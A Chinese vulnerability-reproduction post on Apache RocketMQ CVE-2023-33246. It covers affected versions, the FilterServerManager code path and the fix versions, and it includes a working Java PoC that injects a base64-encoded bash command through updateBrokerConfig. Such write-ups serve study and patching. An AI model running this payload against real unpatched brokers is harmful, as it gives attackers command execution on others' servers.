漏洞复现-Apache RocketMQ 远程命令执行漏洞(CVE-2023-33246)

1.漏洞描述

RocketMQ是一个分布式消息和流数据平台,具有低延迟、高性能、高可靠性、万亿级容量和灵活的可扩展性。

Apache RocketMQ此漏洞是一个远程命令执行漏洞。RocketMQ的NameServer、Broker、Controller等多个组件缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。此外,攻击者可以通过伪造 RocketMQ 协议内容来达到同样的效果。

2.影响版本

Apache RocketMQ <= 5.1.0 Apache RocketMQ <= 4.9.5

3.影响范围

4.漏洞分析

复制代码
在函数 org.apache.rocketmq.broker.filtersrv.FilterServerManager 61行
复制代码
调用下面的 createFilterServer 方法,71行中看到从配置文件中获取参数。72行调用方法 buildStartCommand

该方法中取到变量 NamesrvAddr 和 RocketmqHome ,获取之后进行拼接cmd,在72行拿到拼接后的 cmd

进入for循环后在 org.apache.rocketmq.broker.filtersrv.FilterServerUtil 中给的 callshell 方法去执行命令

复制代码
该中间件本来就是每30秒执行一次,漏洞产生的就是修改了配置文件,变量被赋值为了恶意命令,导致了命令执行。
复制代码
Poc:
复制代码
import org.apache.rocketmq.tools.admin.DefaultMQAdminExt;
import java.util.Properties;
public class EXP {
    public static void main(String[]args) throws Exception{
        // 创建 Properties 对象
        Properties props = new Properties();
        props.setProperty("rocketmqHome","-c {echo,dG91Y2ggL3RtcC9mbGFn}|{base64,-d}|bash -c");
        props.setProperty("filterServerNums","1");
        // 创建 DefaultMQAdminExt 对象并启动
        DefaultMQAdminExt admin = new DefaultMQAdminExt();
        admin.setNamesrvAddr("127.0.0.1:9876");
        admin.start();
        // 更新配置⽂件
        admin.updateBrokerConfig("127.0.0.1:10911", props);
        Properties brokerConfig = admin.getBrokerConfig("127.0.0.1:10911");
        System.out.println(brokerConfig.getProperty("rocketmqHome"));
        System.out.println(brokerConfig.getProperty("filterServerNums"));
        // 关闭 DefaultMQAdminExt 对象
        admin.shutdown();
        }
}

5. 修复建议

厂商已发布了漏洞修复程序,建议用户升级到如下版本:

Apache RocketMQ 5.1.1

Apache RocketMQ 4.9.6

官方下载地址:https://rocketmq.apache.org/zh/download

相关推荐
火白学安全2 小时前
《Python红队攻防脚本零基础编写:入门篇(一)》
python·安全·web安全·网络安全·系统安全
携欢2 小时前
PortSwigger靶场之Exploiting server-side parameter pollution in a REST URL通关秘籍
前端·javascript·安全
好家伙VCC3 小时前
**发散创新:渗透测试方法的深度探索与实践**随着网络安全形势日益严峻,渗透测试作为评估系统安全的
java·python·安全·web安全·系统安全
人邮异步社区3 小时前
内网攻防实战图谱:从红队视角构建安全对抗体系
网络·安全·web安全
胡耀超4 小时前
大数据平台安全指南——大数据平台安全架构全景:从认证授权到数据治理的企业级实践指南——认证、授权、审计、加密四大支柱
安全·数据治理·数据安全·权限管理·安全架构·hadoop生态·合规审计
深盾科技6 小时前
C/C++逆向分析实战:变量的奥秘与安全防护
c语言·c++·安全
你的人类朋友11 小时前
“签名”这个概念是非对称加密独有的吗?
前端·后端·安全
携欢12 小时前
PortSwigger靶场之CSRF where token validation depends on request method通关秘籍
安全·web安全·csrf
周杰伦_Jay13 小时前
【计算机网络表格图表解析】网络体系结构、数据链路层、网络层、传输层、应用层、网络安全、故障排查
计算机网络·安全·web安全
黄金旺铺16 小时前
从 FinalShell 迁移到 WindTerm:一次安全、高效、开源的终端升级之旅
安全·开源·windterm·finalshell